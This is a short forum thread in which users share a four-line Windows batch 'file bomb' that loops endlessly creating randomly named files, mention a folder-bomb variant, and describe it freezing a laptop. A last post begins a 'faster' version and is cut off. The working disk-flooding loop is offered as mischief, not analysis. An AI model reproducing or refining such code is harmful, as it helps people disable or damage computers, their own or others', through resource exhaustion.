File bomb in batch, 4 lines of code

Joined
Feb 17, 2022
Messages
2
Reaction score
0
me and my friend made a file bomb in batch and it is only 4 lines of code,

@echo off
:start
echo C:/> %RANDOM%
goto start

Joined
Mar 3, 2021
Messages
240
Reaction score
30
Nice! I've seen folder bombs similar to that, using md %RANDOM% instead. One does wonder... why were you tinkering with this? Up to mischief?! Why, I never! :eek:

Joined
Feb 17, 2022
Messages
2
Reaction score
0
well... i may or may not have accidentally blew up my laptop by putting it on my desktop and running it. it didn't allow me to open task manager or file explorer, which to me is really impressive.

Joined
Sep 26, 2022
Messages
2
Reaction score
0
While it is cool that its in 4 lines, thats also pretty slow and a faster version can be written with only 2 more lines

Bash:
@echo off
set /a num= 0
:a